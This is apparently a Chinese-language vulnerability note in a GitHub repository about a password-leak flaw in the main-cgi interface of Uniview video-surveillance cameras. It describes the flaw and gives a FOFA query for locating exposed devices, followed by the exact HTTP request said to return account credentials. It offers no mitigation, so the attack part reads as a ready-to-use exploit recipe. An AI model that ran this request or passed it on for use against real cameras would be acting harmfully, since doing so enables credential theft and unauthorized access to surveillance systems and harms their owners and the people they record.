Skip to content

Latest commit

 

History

History
26 lines (16 loc) · 1.2 KB

浙江宇视科技视频监控main-cgi密码泄露漏洞.md

File metadata and controls

26 lines (16 loc) · 1.2 KB

浙江宇视科技视频监控main-cgi密码泄露漏洞

一、漏洞描述

宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机,它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术,具有高清晰度、低照度、宽动态等特点,能够提供高质量的视频图像。该系统main-cgi接口处存在信息泄露漏洞,可以获取账号密码

二、影响版本

uniview-视频监控

三、资产测绘

fofa:app="uniview-视频监控"

特征:

1708565407817-95f2e1e3-c9e8-4be1-92cd-e92186ec8b04.png

四、漏洞复现

/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}

1708565517673-5422b422-875e-4092-a261-6e86a1419ec6.png1708565528046-ba2ea20d-a3b0-4d49-9a3f-7c4ac24001ac.png

更新: 2024-02-29 23:57:12
原文: https://www.yuque.com/xiaokp7/ocvun2/bky3gsuwp052gmtn